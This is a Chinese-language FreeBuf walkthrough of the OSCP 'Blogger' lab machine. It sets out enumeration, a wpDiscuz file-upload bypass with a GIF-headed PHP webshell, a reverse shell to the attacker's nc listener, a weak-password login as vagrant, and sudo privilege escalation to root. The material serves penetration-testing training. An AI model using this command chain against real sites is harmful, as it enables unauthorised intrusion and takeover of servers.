freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

从WEB到内网&&文件上传&&内网弱口令&&sudo提权 ------- 打靶经验分享
芝士土拨鼠 2023-08-25 17:24:52 111407

OSCP靶机-------Blogger

今天来打一个OSCP的靶机,难度偏高,包含了端口探测,服务探测,ssh弱口令,CMS识别,文件上传绕过,nc反弹shell,sudo提权等等…靶场难度中等偏高,需要收集两个flag,一个flag低权限shell就可以获取,第二个要提权后才可以获取。希望大家看完可以有所收获。

启动环境

启动VPN:openvpn universal.ovpn
image.png
攻击机IP为:192.168.45.181
启动目标靶机:
image.png
目标靶机IP为: 192.168.187.217

信息收集

1.端口
nmap扫描端口
nmap --min-rate 10000 -p- 192.168.187.217
image.png
只有22,80两个端口
22-ssh 80-http
2.端口测试
2.122-ssh
手工弱口令登一下试试。
ssh root@192.168.187.217 -p 22
image.png
ssh公钥有问题,无法继续。那么想用hydra爆破也就行不通了。
2.180-http
访问192.168.187.217:80
image.png
看上去很精致,应该黑丝有cms,直接查一下。
whatweb http://192.168.187.217:80
image.png
匪夷所思,是blogger么?msf搜一下。
msfconsole
searchsploit Blogger
image.png
没有。换思路,看一下源码:
curl http://192.168.187.217:80
image.png
没什么有用的信息。那就dirsearch扫一下目录。
dirsearch -u http://192.168.187.217
image.png
看一下assets。
访问192.168.187.217:80/assets
image.png
是一个目录遍历。就是这个网站的一些css、js、fonts图标等等。
不过在fonts中有一个blog文件。看上去在记录owasp top10。
image.png
随便点点,发现会跳转到一个域名blogger.thm。
image.png
看上去要绑定hosts:
vim /etc/hosts
然后在最后加上
192.168.187.217 blogger.thm
image.png
再次访问刚才的blog站点。正常咯。
image.png
看一下cms:
whatweb http://blogger.thm/assets/fonts/blog/
image.png
cms是WordPress 4.9.8,搜一下exp看看。
msfconsole
searchsploit WordPress 4.9.8
image.png
全是插件,也没有rce,wp老漏洞大户了,肯定有专门的wp扫描:wpscan
kali里就有,直接用:
wpscan --url http://blogger.thm/assets/fonts/blog/
image.png
出洞了,http://blogger.thm/assets/fonts/blog/wp-content/uploads/有文件上传。
image.png

还是文件遍历,随便点点。发现一个php
image.png
image.png
点进去发现了gif的文件头。应该网站里是有一个上传图片的地方。慢慢找一下。在wp的页面,owasp top10中有上传图片的地方。
image.png
这应该是wordpress的组件,源代码定位一下。
image.png
调用的wpdiscuz的组件,抓一下网络的包。image.png
现在确认了版本信息:wpdiscuz 7.0.4
msf搜索exp
msfconsole
searchsploit wpdiscuz 7.0.4
image.png
search wpdiscuz 7.0.1
image.png
use 0
show options
image.png
set lhost 192.168.45.181
set rhosts 192.168.187.217
set blogpath /assets/fonts/blog/?p=29
run
image.png
失败。。。。回去试试手工文件上传。
经过测试只能上传gif文件,先制作一个图片马。
copy 1.jpg/a +shell.php/b shell.jpg
1.jpg为正常的图片,尽可能选择小点的图片,shell.php 为 php一句话木马。
准备上传,打开burpsuite,抓包改一下文件头看能否上传。并且将后缀改为php。
image.png
image.png
image.png
可以看到上传的位置,直接蚁剑链接。
image.png
image.png
有shell了!

内网渗透

利用python获取交互shell
python -c "import pty;pty.spawn('/bin/bash')";
获取flag:
find / -name local.txt 2>/dev/null
cat /home/james/local.txt
image.png

提权

1.sudo提权
sudo -l
image.png
2.suid提权
find / -perm -u=s -type f 2>/dev/null
image.png
没合适的。
3.suid-getcap提权
/usr/sbin/getcap -r / 2>/dev/null
image.png
4.Cron job提权
cat /etc/crontab
查找定时任务。
image.png
5.内核overlayfs提权
lsb_release -a看看发行版本
image.png
Ubuntu 16.04.7 LTS 符合
uname -a看看内核版本
image.png
内核版本 4.4.0-206 不符合
都失败了,继续信息收集。

内网信息收集

看一下用户:
ls -al /home
image.png
看一下是否有隐藏文件
ls -al /home/james
image.png

内网用户密码弱口令爆破,vagrant/vagrant成功了
image.png
但蚁剑好像不太对劲。
这蚁剑的一句话shell就不太行啊,重新拿shell。用kali的webshell:
cp一个出来
sudo cp /usr/share/webshells/php/php-reverse-shell.php exp
image.png
改后缀。
cp php-reverse-shell.php ./shell.jpg
修改监听ip和端口:
vim php-reverse-shell.php
image.png
nc开启监听:
nc -lvvp 1234
image.png
上传该文件,burpsuite抓包修改GIF89a头。
image.png

nc直接成功getwebshell
image.png

二次提权

重复之前的操作,vagrant弱口令登录。
1.sudo提权
image.png
存在(ALL) NOPASSWD: ALL
su提权
sudo su
image.png
提权成功。
获取flag2:cat /root/proof.txt
image.png

# 渗透测试 # 网络安全 # web安全 # 系统安全 # 数据安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 芝士土拨鼠 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
芝士土拨鼠 LV.7
奉天安全团队 技术交流tuboshusec
  • 78 文章数
  • 101 关注者
APP攻防&Android逆向&HOOK抓包&组件安全
2024-02-23
漏洞复现--Confluence远程代码执行漏洞(CVE-2023-22527)
2024-01-23
漏洞复现--Likeshop任意文件上传(CVE-2024-0352)
2024-01-16
文章目录